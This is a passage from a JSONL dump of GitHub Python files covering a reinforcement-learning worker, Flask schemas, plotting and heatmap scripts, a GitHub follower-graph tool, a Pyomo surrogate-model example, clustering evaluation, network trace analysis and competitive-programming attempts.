self.rollout(shift=shift, noise=delta, sampled_t=sampled_t)\n\n # self.policy.update_weights(w_policy - delta)\n if not self.one_point: \n neg_reward, neg_steps, neg_obs = self.rollout(shift=shift, noise=-delta, sampled_t=sampled_t)\n else:\n neg_reward = 0.\n neg_steps = 0.\n neg_obs = pos_obs.copy()\n\n if not np.array_equal(pos_obs, neg_obs):\n raise NotImplementedError('Only completely deterministic environments are handled. Use one point for stochastic environments')\n\n if pos_obs is None or neg_obs is None:\n raise Exception('Observation not assigned')\n\n #if len(pos_obs) == 0 or len(neg_obs) == 0:\n # raise Exception('Observation not assigned')\n\n steps += pos_steps + neg_steps\n rollout_rewards.append([pos_reward, neg_reward])\n obs.append(pos_obs)\n\n return {'deltas_idx': deltas_idx, 'rollout_rewards': rollout_rewards, 'steps': steps, 'obs': obs}\n\n def stats_increment(self):\n self.policy.observation_filter.stats_increment()\n return\n\n def get_weights(self):\n return self.policy.get_weights()\n\n def get_filter(self):\n return self.policy.observation_filter\n\n def sync_filter(self, other):\n self.policy.observation_filter.sync(other)\n return\n","repo_name":"LAIRLAB/contrasting_exploration_rl","sub_path":"exact/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"213552069","text":"from flask_marshmallow import Marshmallow\n\nfrom .models import Customer, Project, Task\n\nma = Marshmallow()\n\n\nclass CustomerSchema(ma.ModelSchema):\n class Meta:\n model = Customer\n fields = ['id', 'name', 'created_at', '_links']\n\n created_at = ma.DateTime(dump_only=True)\n _links = ma.Hyperlinks({\n 'self': ma.URLFor('api.customers', id=''),\n 'collection': ma.URLFor('api.customers'),\n # 'projects': fields.Nested('ProjectSchema', many=True, exclude=('customer')),\n })\n\n\nclass ProjectSchema(ma.ModelSchema):\n class Meta:\n model = Project\n fields = ['id', 'name', 'created_at', 'customer']\n # fields = ['id', 'name', 'created_at', 'customer', '_links']\n\n created_at = ma.DateTime(dump_only=True)\n customer = ma.Nested(CustomerSchema, exclude=('projects'))\n # _links = ma.Hyperlinks({\n # 'self': ma.URLFor('api.project', id='', _external=True),\n # 'parent': ma.URLFor('api.projects'),\n # })\n\n # @pre_load()\n # def get_customer(self, data):\n # if isinstance(data['customer'], int):\n # data['customer'] = customer_service.find(data['customer']).__dict__\n # return data\n\n\nclass TaskSchema(ma.ModelSchema):\n class Meta:\n model = Task\n fields = ['id', 'name', 'start', 'end', '_links']\n\n project = ma.Nested('ProjectSchema', exclude=('tasks'))\n # _links = ma.Hyperlinks({\n # 'self': ma.URLFor('api.task', id='', _external=True),\n # 'parent': ma.URLFor('api.tasks'),\n # })\n\n\ncustomer_schema = CustomerSchema()\nproject_schema = ProjectSchema()\ntask_schema = TaskSchema()\n","repo_name":"barthuttinga/clockit-api","sub_path":"clockit_api/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43144297715","text":"# https://ac.nowcoder.com/acm/contest/66651/A\n\nn = int(input())\nlst = list(map(int, input().split()))\nlst.sort()\ncnt = 0\nfor i in range(len(lst) - 1):\n if lst[i + 1] - lst[i] <= 1:\n cnt += 1\n else:\n break\nif cnt < n - 1:\n print(\"NO\")\nelse:\n print(\"Yes\")\n","repo_name":"xingwenzan/PythonProgramFiles","sub_path":"算法/Other/教科书般的亵渎.py","file_name":"教��书般的亵渎.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"20078672141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 15 22:05:57 2019\n\n@author: ankusmanish\n\"\"\"\n\n#Write a program to draw a scatter plot of “day” against “total bill” for a dataset given in a url \n\nimport matplotlib.pyplot as plt\nimport seaborn as sea\nimport pandas as pd\n\ndata = pd.read_csv('tips.csv')\n\nx = data['day']\ny = data['total_bill']\n\nplt.figure(figsize = (8,6))\nsea.scatterplot(x,y, hue = x)\nplt.xlabel('Day')\nplt.ylabel('Total Bill')","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week4/Seaborn/Scatterplot/Program_1.py","file_name":"Program_1.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36509095300","text":"\"\"\"\n @FileName:DetectImage.py\n @Author:yikai yang\n @Date:2023/1/12\n @Desc:Null\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, Normalize\nfrom scipy.stats import multivariate_normal\nimport queue\n\nCOLOUR_ROUTE = (255, 0, 0)\nRADIOS_ROUTE = 10\n\n\nclass DetectImage():\n\n def __init__(self, draw_list, frame_size, route):\n\n self.draw_list = draw_list\n self.frame_size = frame_size\n self.route = route\n self.queueList = [queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(),\n queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue(), queue.Queue()]\n\n def __init__(self):\n\n self.draw_list = []\n self.frame_size = ()\n self.route = []\n\n def set_draw_list(self, draw_list):\n\n self.draw_list = draw_list\n\n def set_frame_size(self, frame_size):\n\n self.frame_size = frame_size\n\n def set_route(self, route):\n\n self.route = route\n\n def draw_route(self, img, before_point, route_list, permission):\n \"\"\"\n draw route from a finger\n\n :argument img to draw, before point, route list, which finger\n :return img\n \"\"\"\n for single_position in route_list:\n if not single_position:\n\n continue\n else:\n single_position = single_position[permission]\n if before_point is None:\n before_point = single_position\n else:\n cv2.line(img, (before_point[1], before_point[2]), (single_position[1], single_position[2]),\n COLOUR_ROUTE, RADIOS_ROUTE)\n before_point = single_position\n\n return img, before_point\n\n def draw_already(self):\n \"\"\"\n draw already pass area\n\n :argument left hand data, right hand data, which finger to draw, frame\n :return img\n \"\"\"\n img_blank = np.zeros((int(self.frame_size[1]), int(self.frame_size[0]), 3), np.uint8)\n img_blank[:] = [255, 255, 255]\n before_point = None\n for i in range(len(self.draw_list)):\n if self.draw_list[i]:\n img_blank, before_point = self.draw_route(img_blank, before_point, self.route, i)\n\n return img_blank\n\n def calcutate_normal(self, img, rout_list, pos, finger):\n \"\"\"\n generate normal distribution\n\n :argument left hand data, right hand data, which finger to draw, frame\n :return img\n \"\"\"\n for single_position in rout_list:\n\n if not single_position:\n\n continue\n else:\n single_position = single_position[finger]\n\n rv = multivariate_normal([single_position[1], single_position[2]], [[50, 0], [0, 50]])\n Z = rv.pdf(pos)\n img += Z\n\n return img\n\n def hot_draw(self):\n \"\"\"\n generate heat map\n\n :argument left hand data, right hand data, frame, which finger to draw\n :return img\n \"\"\"\n # Generate mockup data\n h = self.frame_size[1]\n w = self.frame_size[0]\n x = np.arange(w)\n y = np.arange(h)\n X, Y = np.meshgrid(x, y)\n\n pos = np.dstack((X, Y))\n zombies = np.zeros((int(h), int(w)), np.float64)\n\n for i in range(len(self.draw_list)):\n if self.draw_list[i]:\n zombies = self.calcutate_normal(zombies, self.route, pos, i)\n\n zombies /= np.max(zombies)\n # Generate custom colormap with alpha channel,\n # cf. https://stackoverflow.com/a/37334212/11089932\n cmap = cm.autumn_r\n c_cmap = cmap(np.arange(cmap.N))\n c_cmap[:, -1] = np.linspace(0, 1, cmap.N)\n c_cmap = ListedColormap(c_cmap)\n\n # Generate heatmap, cf. https://stackoverflow.com/a/31546410/11089932\n norm = Normalize(vmin=zombies.min(), vmax=zombies.max())\n heatmap = c_cmap(norm(zombies))\n heatmap = cv2.cvtColor(np.uint8(heatmap * 255), cv2.COLOR_RGBA2BGRA)\n return heatmap\n\n def judge_in_zoom(self, contours, x, y):\n \"\"\"\n generate in heat zone and out heat zone time\n\n :argument wheather in the zone, finger data, coord zone, time stamp, time start into the zone list, time out into the zone list\n :return time start into the zone list, time out into the zone list\n \"\"\"\n\n for contour in contours:\n result = cv2.pointPolygonTest(contour, (x, y), False)\n if result >= 0:\n M = cv2.moments(contour)\n\n # Calculate the centroid coordinates\n cx = int(M[\"m10\"] / M[\"m00\"])\n cy = int(M[\"m01\"] / M[\"m00\"])\n\n return cx, cy\n\n return -1, -1\n\n def calculate_hot(self, image):\n \"\"\"\n generate in heat zone and out heat zone time list\n\n :argument image, left finger data, right finger data, which finger to draw\n :return time start into the zone list, time out into the zone list\n \"\"\"\n heatmap = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Convert the image to grayscale\n gray_heatmap = cv2.cvtColor(heatmap, cv2.COLOR_RGB2GRAY)\n\n # Apply a threshold to identify the heavy color areas\n _, thresholded = cv2.threshold(gray_heatmap, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n # Find the contours of the thresholded areas\n contours, _ = cv2.findContours(thresholded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n isInZoom = [False, False, False, False, False, False, False, False, False, False]\n\n for i in range(len(self.draw_list)):\n\n if self.draw_list[i] and not isInZoom[i]:\n x, y = self.judge_in_zoom(contours, x, y)\n if x != -1:\n self.queueList[i].put((x, y))\n\n for i in range(len(self.draw_list)):\n\n if self.draw_list[i]:\n self.draw_route_hot(self.queueList[i], contours)\n\n return contours\n\n def draw_route_hot(self, queue, img):\n\n \"\"\"\n generate route of heat map\n\n :argument heap\n :return img\n \"\"\"\n last_one = queue.get()\n\n while queue.size() != 0:\n this_one = queue.get()\n\n cv2.line(img, (last_one[0], last_one[1]), (this_one[0], this_one[1]),\n COLOUR_ROUTE, RADIOS_ROUTE)\n last_one = this_one\n\n return img\n","repo_name":"big97kai/FingerDetect","sub_path":"Functions/DetectImage.py","file_name":"DetectImage.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9251338658","text":"import requests\r\nfrom github import Github\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\naccessTokenFile = open('token.txt', 'r')\r\ntoken = accessTokenFile.readline()\r\naccessTokenFile.close()\r\ng = Github(token)\r\nrelationGraph = nx.Graph()\r\n\r\n\r\ndef main():\r\n loopProgram = 1\r\n exitCondition = 1\r\n while loopProgram:\r\n while exitCondition:\r\n print(\"Enter the username of the user you would like to look at:\")\r\n user = input()\r\n r = requests.get('https://api.github.com/users/' + user)\r\n if '404' in r:\r\n print(\"That didn't seem to be a valid user, please try again\")\r\n else:\r\n exitCondition = 0\r\n print(\"User found!\")\r\n\r\n exitCondition = 0\r\n user = g.get_user(user)\r\n relationGraph.add_node(user.name, repos= user.get_repos().totalCount ,followers= user.get_followers().totalCount, following= user.get_following().totalCount)\r\n print(\"Would you like to see this users Repositories ('Y' for Yes, anything else for No)\")\r\n if input() == 'Y':\r\n for repo in user.get_repos():\r\n if repo.description != None:\r\n print(repo.name + \": \" + repo.description)\r\n else:\r\n print(repo.name + \": No Desciption\")\r\n else:\r\n print(\"'Y' Not detected.\")\r\n if user.get_repos().totalCount == 0:\r\n print(\"The user had no repositories.\")\r\n if user.get_projects().totalCount == 0:\r\n print(\"The user had no projects.\")\r\n print(\"The user had\", user.get_followers().totalCount, \"followers and followed\", user.get_following().totalCount, \"people.\")\r\n print(\"Would you like to see the Users followers and their relevant statistics? ('Y' for Yes, anything else for No)\")\r\n print(\"This step may take a while no matter the choice.\")\r\n if input() == 'Y':\r\n if user.get_followers().totalCount == 0:\r\n print(\"The user had no followers and followed \", user.get_following().totalCount, \" people.\")\r\n else:\r\n print(\"Their followers were:\")\r\n for follower in user.get_followers():\r\n print(follower.name, \"who has\", follower.get_followers().totalCount, \"followers and\", follower.get_repos().totalCount, \"repos\")\r\n relationGraph.add_node(follower.name, repos= follower.get_repos().totalCount ,followers= follower.get_followers().totalCount, following= follower.get_following().totalCount)\r\n relationGraph.add_edge(user.name, follower.name, relationship=\"Follower\")\r\n else:\r\n for follower in user.get_followers():\r\n relationGraph.add_node(follower.name,\r\n repos=follower.get_repos().totalCount,\r\n followers=follower.get_followers().totalCount,\r\n following=follower.get_following().totalCount)\r\n relationGraph.add_edge(user.name, follower.name, relationship=\"Follower\")\r\n plt.plot\r\n pos = nx.spring_layout(relationGraph)\r\n color = range(20)\r\n print(\"Would you like to see the graph comparison based followers, following, or repos?('repo' for repository data, 'followers' for followers and 'following' for following)\")\r\n graphChoice = input()\r\n if graphChoice == 'repo' or graphChoice == 'followers' or graphChoice == 'following':\r\n d = nx.get_node_attributes(relationGraph, graphChoice)\r\n else:\r\n print(\"Choice didn't match any options. Default option of repositories chosen\")\r\n d = nx.get_node_attributes(relationGraph, 'repos')\r\n options = {\r\n \"node_color\": \"#A0CBE2\",\r\n \"edge_color\": \"gray\",\r\n \"width\": 2,\r\n \"edge_cmap\": plt.cm.Blues_r,\r\n \"with_labels\": True,\r\n \"node_size\": [v*100 for v in d.values()],\r\n }\r\n nx.draw(relationGraph, pos, **options)\r\n plt.show()\r\n else:\r\n print(\"'Y' not detected.\")\r\n print(\"Program complete!\")\r\n exit()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Conall-Tuohy/3rdYearCollege","sub_path":"SoftwareEngineering/GithubAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3064857827","text":"import json\n\n\nclass DynAmountLineAsset:\n \"\"\"\n Quantité d'actif du portefeuille de composition historique\\n\n asset: Actif\\n\n quantity: Quantité de l'actif\n \"\"\"\n\n def __init__(self, asset_: int, quantity_: float):\n\n if not asset_:\n raise Exception(\"A DynAmountLineAsset must have an asset.\")\n\n if not quantity_:\n raise Exception(\"A DynAmountLineAsset must have a currency.\")\n\n self.asset = asset_\n self.quantity = quantity_\n\n\ndef jsonToDynAmountLineAsset(jsonAsset):\n dictionary = None\n\n if type(jsonAsset) is str:\n dictionary = json.loads(jsonAsset)\n elif type(jsonAsset) is dict:\n dictionary = jsonAsset\n\n asset = DynAmountLineAsset(dictionary['asset'], dictionary['quantity'])\n\n return asset\n","repo_name":"grassetg/DolphinBillionaires","sub_path":"models/dynAmountLineAsset.py","file_name":"dynAmountLineAsset.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1445114768","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 3 14:31:58 2019\n\n@author: miguel\n\"\"\"\ncount = []\na = []\nwith open('names.txt','r') as names:\n for linea in names:\n linea = str(linea)\n linea = linea.rstrip('\\n')\n a=a.append(linea)\n # count = count.append(user.count(linea))\n \n","repo_name":"mike9739/tesis","sub_path":"contador.py","file_name":"contador.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6342483125","text":"import pyomo.environ as pyo\nfrom idaes.surrogate.pysmo.polynomial_regression import *\nfrom idaes.surrogate.pysmo import kriging\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef main():\n def branin_function(x1, x2):\n pi = 3.1417\n t1 = (x2 - (5.1 * x1 * x1 / (4 * pi * pi)) + (5 * x1 / pi) - 6) ** 2\n t2 = (10 * (1 - 1/(8 * pi))*np.cos(x1))\n y = t1 + t2 + 10\n return y\n\n # Create 20 random samples for training, 100 for testing\n np.random.seed(100)\n ndata = 25\n nval = 100\n x = np.random.uniform([-5, 0], [10, 15], (ndata, 2))\n xval = np.random.uniform([-5, 0], [10, 15], (nval, 2))\n y = branin_function(x[:, 0], x[:, 1])\n yval = branin_function(xval[:, 0], xval[:, 1])\n xy_data = np.concatenate((x, y.reshape(y.size, 1)), axis=1)\n\n # Train polynomial model with basis functions similar to ALAMO example: 4th order mononomials, exponents, and first and second degree interaction terms\n train_obj = PolynomialRegression(xy_data, xy_data, maximum_polynomial_order=4, multinomials=1, training_split=0.8, number_of_crossvalidations=5, overwrite=True)\n p = train_obj.get_feature_vector()\n train_obj.set_additional_terms([p[0] * p[0] * p[1], p[0] * p[1] * p[1], p[0] * p[0] * p[1] * p[1], pyo.exp(p[0]), pyo.exp(p[1])])\n train_obj.training()\n\n # Evaluate model performance as R2\n y_predict = train_obj.predict_output(xval)\n r2 = kriging.KrigingModel.r2_calculation(yval, y_predict)\n print('\\nThe R^2 value for the polynomial over the 100 off-design points is', r2)\n\n # Print Pyomo expression\n m = pyo.ConcreteModel()\n m.x = pyo.Var([1, 2])\n print(train_obj.generate_expression([m.x[1], m.x[2]]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IDAES/examples-pse","sub_path":"src/Examples/SurrMod/PySMO/polyregression_branin_function.py","file_name":"polyregression_branin_function.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"5812448044","text":"import numpy as np\n\nfrom sklearn.cluster import MiniBatchKMeans\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.cluster.hierarchy import ward, cut_tree\n\n\ndef compare_rep_to_label(rep, y, kind='knn'):\n \"\"\"Compare a representation, rep, to a set of labels, y. Fits a k-means\n model to the representation where k is the number of labels. Finds the\n best match between the clusters and labels and compares them.\n\n Parameters\n ----------\n rep: ndarray (n_samples, n_features)\n Representation of the data.\n y: ndarray (n_samples, ) int\n Labels for data.\n\n Returns\n -------\n cluster_idx: ndarray, int (n_classes,)\n Indices of clusters to match with labels.\n label_idx: ndarray, int (n_classes,)\n Indices of labels to match with clusters.\n cost_matrix: ndarray (n_classes, n_classes)\n Cost matrix under original orderings.\n new_cost_matrix: ndarray (n_classes, n_classes)\n Cost matrix under aligned, sorted orderings.\n new_y: ndarray, int (n_classes,)\n Labels under the best cluster labelling.\n accuracy: float\n Labels accuracy under the best cluster labelling.\n null_accuracy: float\n Labels accuracy under a permutation of the best cluster labelling.\n \"\"\"\n if kind not in ['ward', 'knn', 'miniknn']:\n raise ValueError\n dim = y.max() + 1\n\n if kind == 'ward':\n Z = ward(rep)\n yk = cut_tree(Z, n_clusters=dim)\n elif kind == 'knn':\n km = MiniBatchKMeans(dim)\n km.fit(rep)\n yk = km.labels_\n else:\n raise ValueError\n\n cost_matrix = np.zeros((dim, dim))\n for ii in range(dim):\n e1 = yk == ii\n for jj in range(dim):\n e2 = y == jj\n intersect = np.sum(np.logical_and(e1, e2))\n union = np.sum(np.logical_or(e1, e2))\n cost_matrix[ii, jj] = -float(intersect) / union\n row_idx, col_idx = linear_sum_assignment(cost_matrix)\n new_cost_matrix = cost_matrix[row_idx][:, col_idx]\n idxs = np.argsort(np.diag(new_cost_matrix))\n new_cost_matrix = new_cost_matrix[idxs][:, idxs]\n\n new_y = np.zeros_like(y)\n for ii in range(dim):\n new_y[yk == row_idx[ii]] = col_idx[ii]\n accuracy = (new_y == y).mean()\n\n null = []\n for ii in range(10):\n null.append(np.equal(y, np.random.permutation(new_y)).mean())\n null_accuracy = np.mean(null)\n\n return (row_idx, col_idx,\n cost_matrix, new_cost_matrix,\n new_y, accuracy, null_accuracy)\n","repo_name":"BouchardLab/HangulFontsDatasetGenerator","sub_path":"hangul_analysis/hangul_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13116204403","text":"\n#imports\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\n\nimport trace_file_processor as tfp\nimport plotting_analysis as pt\n\n#for the customized linear least squares\nfrom support import *\n\n#for customized probabilistic linear least squares\nfrom probabilistic_regression_support import *\n\n\n### IMPORTANT CONSTANTS ###\n\nDELAY_FACTOR = 3.07\nTICK_TIME = 60\n\n#To index each trial dataset\nTRIAL_1 = 0\nTRIAL_2 = 1\nTRIAL_3 = 2\nTRIAL_4 = 3\nTRIAL_5 = 4\n\nTRIALS = 1\n\n#To index labels and proccessed datasets\nLABELS = 0\nPROCESSED_DATASETS = 1\nAVERAGE = TRIALS #Since processed dataset array will have labels + trials = 1 + TRIALS size\n\n#To index features in datasets\nRTT_GRAD_INDEX = 0\nTHROUGHPUT_INDEX = 1\nQUEUEING_DELAY_INDEX = 2\nINTER_ARRIVAL_INDEX = 3\n\n\n#If we want to normalize\nNORMALIZE=False\n\npath = 'TRAIN-DATA/'\ndirectories = ['ATT-LTE', 'TMobile-LTE', 'Verizon-LTE', 'TMobile-UMTS', 'Verizon-EVDO']\n\ndef get_minimum_length_of_data(data):\n \n N = len(data)\n\n minimum_length = len(data[0][0])\n \n #indicates which trial in first entry and which feature in second entry\n where = (0,0)\n \n #Defining constants for readibility\n WHICH_TRIAL = 0\n WHICH_FEATURE = 1\n \n #Find trial of minimum length for processing\n for i in range(0, N):\n \n rtt_grad_data, throughput, queue_delay, inter_arrival = data[i]\n \n if (len(rtt_grad_data[1:]) < minimum_length):\n \n minimum_length = len(rtt_grad_data[1:])\n where = (i,0)\n \n if (len(throughput[1:]) < minimum_length):\n \n minimum_length = len(throughput[1:])\n where = (i,1)\n \n if (len(queue_delay[1:]) < minimum_length):\n \n minimum_length = len(queue_delay[1:])\n where = (i,2)\n \n if (len(inter_arrival[1:]) < minimum_length):\n \n minimum_length = len(inter_arrival[1:])\n where = (i,3)\n \n return data[where[WHICH_TRIAL]][where[WHICH_FEATURE]], minimum_length\n\n\n\n#Processing the input datasets\n\ndef process_input_datasets(data, minimum_length):\n \n N = len(data)\n \n datasets = []\n \n average = []\n \n for i in range(0, N):\n \n rtt_grad_data, throughput, queue_delay, inter_arrival = data[i]\n \n #Drop tick indicator\n rtt_grad_data = rtt_grad_data[1:]\n throughput = throughput[1:]\n queue_delay = queue_delay[1:]\n inter_arrival = inter_arrival[1:]\n \n \n \n while (len(throughput) > minimum_length):\n throughput = throughput[:len(throughput) - 1]#Ensure they match\n \n while (len(rtt_grad_data) > minimum_length):\n rtt_grad_data = rtt_grad_data[:len(rtt_grad_data) - 1]#Ensure they match\n \n while (len(queue_delay) > minimum_length):\n queue_delay = queue_delay[:len(queue_delay) - 1]#Ensure they match\n \n while (len(inter_arrival) > minimum_length):\n inter_arrival = inter_arrival[:len(inter_arrival) - 1]#Ensure they match\n \n \n #Each row holds a single vector state at consecutive times \n #X = np.hstack((rtt_grad_data[:,None], throughput[:,None], queue_delay[:,None], inter_arrival[:,None]))\n \n #We want to standardize the features for fair comparison of importance later on\n X_pre = np.hstack((rtt_grad_data[:,None], queue_delay[:,None], inter_arrival[:,None]))\n \n u = np.mean(X_pre, axis=0)\n sigma = np.std(X_pre, axis=0)\n \n if NORMALIZE:\n \n X_pre = (X_pre - u)/sigma\n \n X = np.hstack((throughput[:,None], X_pre))\n \n # For computing average later on\n if len(average) > 0:\n \n average = np.vstack((average, [X]))\n else:\n average = np.array([X])\n \n #print(np.std(X[:,2]))\n \n datasets.append(X)\n \n average = np.mean(average, axis=0)\n \n #Average of all trials will be at the end of the dataset list\n datasets.append(average)\n \n return datasets\n\n\ndef process_target_trace(trace_name, DELAY_FACTOR, tick_time, sample_dataset):\n \n #Holds actual link capacity at a particular time\n y, _ = tfp.process_trace(trace_name, ms_per_bin=tick_time)\n\n #To ensure we have the \n START_INDEX = int(math.floor(DELAY_FACTOR/(tick_time / 1000)))\n END_INDEX = pt.get_corresponding_trace_length(y, np.concatenate(([tick_time], sample_dataset)))\n \n #print(\"start: {} \\n\".format(START_INDEX))\n #print(\"end: {} \\n\".format(END_INDEX))\n\n y = y[START_INDEX:END_INDEX + 1] #Ensure we include the last element as we want to 'forecast' (end at time k + 1, whereas\n #the input data sets end at time k)\n\n #Dropping the first element of y means that it will start at time t + 1, whereas the input datasets start at\n #time t. This will allow us to consider what to expect for time t + 1, given the curren time t. We will\n #start by learning the transformation based on this\n\n y = y[1:]\n\n return np.array(y)\n\n\n#Doing analysis\n\ndef find_transformations(datasetss, y):\n \n N = len(datasetss)\n \n models = []\n \n for i in range(0, N):\n \n #Arbitrary regularization\n alpha = 120\n \n X = datasetss[i]\n\n w, b = fit_linreg_gradopt(X, y, alpha)\n \n models.append((w,b))\n \n return models\n\n\n\"\"\" \n\nWill return a dictionary that contains all pairs of datasets for each trace.\nThe dictionary is indexed using the trace name and it holds an array for each\ntrace containing [(rtt_grad_data_run_1, throughput_data_run_1), ...]. Each tuple\nrepresents a pair of data that can be processed into a dataset for training.\n\n\"\"\"\n\ndef get_all_trial_datasets():\n \n N = TRIALS\n data = {}\n\n for direct in directories:\n \n dataset = []\n \n for i in range(1, N + 1):\n \n #read in all the features that are relevant\n inter_arrival = pt.read_data(path + direct + '/inter_arrival_data_run_{}.csv'.format(i))\n queue_delay = pt.read_data(path + direct + '/queue_delay_data_run_{}.csv'.format(i))\n rtt_grad_data = pt.read_data(path + direct + '/rtt_grad_data_run_{}.csv'.format(i))\n throughput = pt.read_data(path + direct + '/throughput_data_run_{}.csv'.format(i))\n \n #pre-processing to ensure no nan values present - treated as 0\n rtt_grad_data = pt.pre_process_data(rtt_grad_data)\n throughput = pt.pre_process_data(throughput)\n \n #NOTE: First value for these datasets is always nan. Might be a bug during collection.\n # We will treat it as zero here, but we might want to remove the datapoint altogether\n #\n # Was a bug in the data collection framework that was fixed\n inter_arrival = pt.pre_process_data(inter_arrival)\n queue_delay = pt.pre_process_data(queue_delay)\n \n dataset.append((rtt_grad_data, throughput, queue_delay, inter_arrival))\n \n\n data[direct] = dataset\n \n return data\n\n\"\"\" \n\nWill return a dictionary that contains the proccessed datasets for all\ntrials for each trace. The trace name is used to access the dictionary\nto get a tuple (y, processed_datasets).\n\nThe entry y in the tuple is the true link capacity, whereas the processed_datasets\nis an array containing the X train data for each trial (starts at trial 1)\n\n\"\"\"\ndef get_all_trial_processed_datasets(data):\n \n processed_train_data = {}\n \n for direct in data:\n \n dataset = data[direct]\n \n #IMPORTANT: THIS IS THE ISSUE. WE CANNOT HAVE TRIALS OF DIFFERENT LENGTHS (USING DIFF TICK TIMES)\n # This is because otherwise this min function will give us the minimum one irrespective of tick time used\n min_trace, min_data_length = get_minimum_length_of_data(dataset)\n \n processed_datasets = process_input_datasets(dataset, min_data_length)\n\n y = process_target_trace('traces/' + direct + '-driving.up', DELAY_FACTOR, TICK_TIME, min_trace[1:])\n \n #Ensure nothing has gone wrong during the processing\n \n #print(len(y))\n #print(len(processed_datasets[0]))\n \n assert(len(y) == len(processed_datasets[0]))\n\n processed_train_data[direct] = (y, processed_datasets)\n \n return processed_train_data\n\n\ndef get_all_trials_models(processed_train_data, ):\n \n models = {}\n \n for direct in processed_train_data:\n \n labels, train_data = processed_train_data[direct]\n \n models[direct] = find_transformations(train_data, labels)\n \n return models\n\n\n#Now, examining how the transformation looks\n\ndef plot_transformation(model, X, Xnew, y):\n \n w = model[0]\n b = model[1]\n \n predicted = Xnew@w + b #These hold the predictions for times t+1 -> k+1\n x_coord = [x*(TICK_TIME / 1000) for x in np.arange(len(y))]\n\n plt.figure(figsize=(18, 8))\n plt.grid()\n plt.plot(x_coord, y, color=\"violet\", label=\"actual hidden state\")\n plt.plot(x_coord, X[:,1], color=\"royalblue\", label=\"observed\")\n plt.plot(x_coord, predicted, color=\"green\", label=\"Predicted\")\n\n plt.legend()\n plt.show()","repo_name":"Fadi-B/ug4-project","sub_path":"data_analyzer.py","file_name":"data_analyzer.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17699918679","text":"'''lots of failed attempts here. I ultimately missed the important observation of len <= 7.'''\nfrom collections import defaultdict as dd\nfrom functools import lru_cache\nfor t in range(int(input())):\n n = int(input()) # length of s\n s = input().strip() # string containing only 'a' 'b' and 'c'\n ''' find the length of the smallest substring where\n - length >= 2\n - 'a' appears more often than 'b'\n - 'a' appears more often than 'c'\n '''\n '''\n sat = {c:[0] for c in 'abc'}\n a_positions = []\n for i,c in enumerate(s):\n if c == 'a': a_positions.append(i)\n for k in sat: sat[k].append(sat[k][-1]+(c==k))\n INVALID = 10**7\n @lru_cache(maxsize=None)\n def dp(start, end):\n while start < end and s[start] != 'a': start += 1\n while start < end and s[end-1] != 'a': end -= 1\n if end-start < 2: return INVALID\n ctr = {k:sat[k][end]-sat[k][start] for k in sat}\n if ctr['a'] < 2: return INVALID\n # remove left, remove right, or try this one.\n mi = dp(start+1,end)\n mi = min(mi, dp(start,end-1))\n if ctr['b'] < ctr['a'] and ctr['c'] < ctr['a']:\n mi = min(mi, end-start)\n return mi\n res = dp(0,n)\n print(-1 if res == INVALID else res)\n '''\n \"\"\"\n i, length = 0, 2\n ctr = dd(int)\n for c in s[:2]: ctr[c] += 1\n mi = float('inf')\n while i+length < n:\n shrink = False\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']: # shrink left\n mi = min(mi, length)\n shrink = True\n if shrink or s[i] != 'a' and length > 2:\n ctr[s[i]] -= 1 # remove left char\n length -= 1\n i += 1\n else: # grow right\n length += 1\n ctr[s[i+length-1]] += 1\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']:\n mi = min(mi, length)\n \n if mi == float('inf'): print('-1')\n else: print(mi)\n \"\"\"\n '''\n for length in range(2,n+1):\n ctr = dd(int)\n for i in range(length): ctr[s[i]] += 1\n for i in range(n-length):\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']: break\n ctr[s[i]] -= 1\n ctr[s[i+length]] += 1\n else:\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']: pass\n else: continue\n 